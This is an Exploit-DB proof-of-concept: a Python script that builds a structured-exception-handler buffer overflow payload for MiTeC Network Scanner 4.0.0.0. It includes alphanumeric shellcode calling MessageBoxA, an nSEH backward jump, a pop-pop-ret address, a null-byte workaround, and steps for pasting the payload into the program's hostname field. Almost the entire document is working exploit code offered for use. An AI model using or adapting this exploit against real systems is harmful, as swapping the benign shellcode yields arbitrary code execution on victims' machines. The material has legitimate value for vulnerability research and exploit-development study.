Network Scanner 4.0.0 - SEH Local Buffer Overflow
Source: https://www.exploit-db.com  Author: n30m1nd  Published: 2016-10-26

#!/usr/bin/python
# -*- coding: utf-8 -*-

### Network Scanner Version 4.0.0.0 - SEH Overflow Exploit by n30m1nd ###

# Date: 2016-10-21
# Exploit Author: n30m1nd
# Exploit Title: Network Scanner Version 4.0.0.0 SEH Based Exploit
# Vendor Homepage: http://www.mitec.cz/
# Software Link: https://www.exploit-db.com/apps/8a419b10772d811ce5eea44cb88ae55b-NetScan.zip
# Version: 4.0.0.0
# Tested on: Win7 64bit and Win10 64 bit

# Credits
# =======
# PoC by: INSECT.B - http://binsect00.tistory.com
#  https://www.exploit-db.com/exploits/39447/
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better

# How to
# ======
# * Run this python script. It will generate an "exploit.txt" file.
# * Copy the contents and, in the program, go to the "TOOLS" tab then click on "Detect IP from hostname" and paste the contents
# * MessageBoxA is called in an infinite loop, since the exception handler is triggered every time

# Exploit code
# ============

import struct

# MessageBoxA in NetScan.exe => 004042F1
mbox = (
  "\x25\x41\x41\x41"
  "\x41\x25\x32\x32"
  "\x32\x32\x50\x68"
  "\x70\x77\x6E\x64"
  "\x54\x5F\x50\x57"
  "\x57\x50\x35\x8E"
  "\x60\x60\x55\x35"
  "\x7F\x22\x20\x55"
  "\x50\xC3"
  )
# JUMP BACK to our shellcode!
nseh = (
        # xor al,51h;  Sets the ZF = 0 (We have to be very unlucky for eax to end in 51h)
        "\x34\x51"
        # jne -32h;  Jump if ZF = 0
        "\x75\xCC"
        )
# pop pop ret => 00402E67
sehh = struct.pack("<L", 0x00402e67)

payl = "A" * (76-48)
payl+= mbox
payl+= "A"*(48-len(mbox))
payl+= nseh + sehh

with open("exploit.txt","wb") as f:
 f.write(payl[:-1])
print payl

"""
NOTE:
The original author of this PoC stated that it could not be exploited,
since all addresses inside the binary contain a null byte.
As you can see in this exploit, the null byte is added by default at
the end because strings are null terminated when read from an input
box. This is why we write the payload minus 1 byte, payl[:-1]: we
don't need to write the last null byte of the "pop pop ret" address
in the "sehh" variable.
"""
